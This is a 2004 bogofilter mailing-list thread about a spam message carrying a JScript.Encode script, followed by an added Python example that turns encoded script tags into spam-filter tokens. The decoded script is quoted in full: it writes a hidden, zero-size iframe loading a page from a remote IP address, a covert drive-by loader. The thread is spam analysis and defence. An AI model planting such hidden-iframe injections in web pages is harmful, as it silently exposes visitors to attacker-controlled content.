What's that?
David Relson
relson at osagesoftware.com
Sat Sep 4 00:14:50 CEST 2004
On Fri, 3 Sep 2004 14:11:54 -0400
Bob Vincent wrote:
> Two minutes of googling yields the following:
>
> http://www.klaphek.nl/nr6/scrdec.html
>
> Which led me to
>
> http://www.virtualconspiracy.com/index.php?page=/scrdec/intro
>
> from which I downloaded the following file:
>
> http://www.virtualconspiracy.com/download/scrdec15.c
>
> Which I compiled to produce an executable called "scrdec"
>
> So I saved your attachment, unpacked it, opened it in mutt, and
> saved the text/html portion to a file called "spam-message.html"
>
> I ran the compiled "scrdec" program as follows:
>
> ./scrdec spam-message.html spam-message.decoded
>
> After decoding, the contents of the <script> tags read as follows:
>
> document.write('<IFRAME SRC="http://201.12.78.176/link.html" WIDTH=440
> HEIGHT=440 FRAMEBORDER=0 SCROLLING="no"
> style="display:none;"></IFRAME>')
>
> ... which references a webserver located in Brazil.
>
> On Fri, Sep 03, 2004 at 12:25:16PM -0400, Matej Cepl wrote:
> > Can anybody comment on the attached piece of spam (of course,
> > correctly caught by bogofilter)? What does that <script> element in
> > the end of the message mean?
> >
> > Matej
Matej & Bob,
Thanks for presenting the problem and an answer. Having bogofilter
parse the script tag, i.e. <script language="JScript.Encode">, should be
very easy and might be valuable. Having bogofilter actually decode the
JScript stuff is harder and can wait until there's a pressing need for
it, right?
David
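
Added example, not part of the original thread and not bogofilter's code: one way a mail filter could turn an encoded `<script>` tag into classifier tokens without decoding the script body. The token names, the `script_tokens` helper and the sample message are assumptions made for illustration; the `#@~^` value is the start marker that the Windows Script Encoder writes at the beginning of encoded data.

```python
import email
from email import policy
from html.parser import HTMLParser

ENCODED_MARKER = "#@~^"  # start marker of Script Encoder output
# Constructed sample message; the script body is a placeholder, not real encoded data.
SAMPLE_SPAM = (
    "Subject: constructed sample\nMIME-Version: 1.0\n"
    "Content-Type: text/html; charset=us-ascii\n\n"
    "<html><body><p>Hello</p>"
    '<script language="JScript.Encode">#@~^PLACEHOLDER^#~@</script></body></html>\n'
)

class ScriptTagScanner(HTMLParser):
    # Token names below are hypothetical, not bogofilter's own tokens.
    def __init__(self):
        super().__init__()
        self.tokens, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        lang = (dict(attrs).get("language") or "").strip().lower()
        if lang:
            self.tokens.append("script-language:" + lang)
        if lang.endswith(".encode"):  # JScript.Encode, VBScript.Encode
            self.tokens.append("script-encoded")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and ENCODED_MARKER in data:
            self.tokens.append("script-body-encoded")

def script_tokens(raw_message):
    # Scan every text/html part of an RFC 822 message string.
    msg = email.message_from_string(raw_message, policy=policy.default)
    tokens = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            scanner = ScriptTagScanner()
            scanner.feed(part.get_content())
            scanner.close()
            tokens.extend(scanner.tokens)
    return tokens
```
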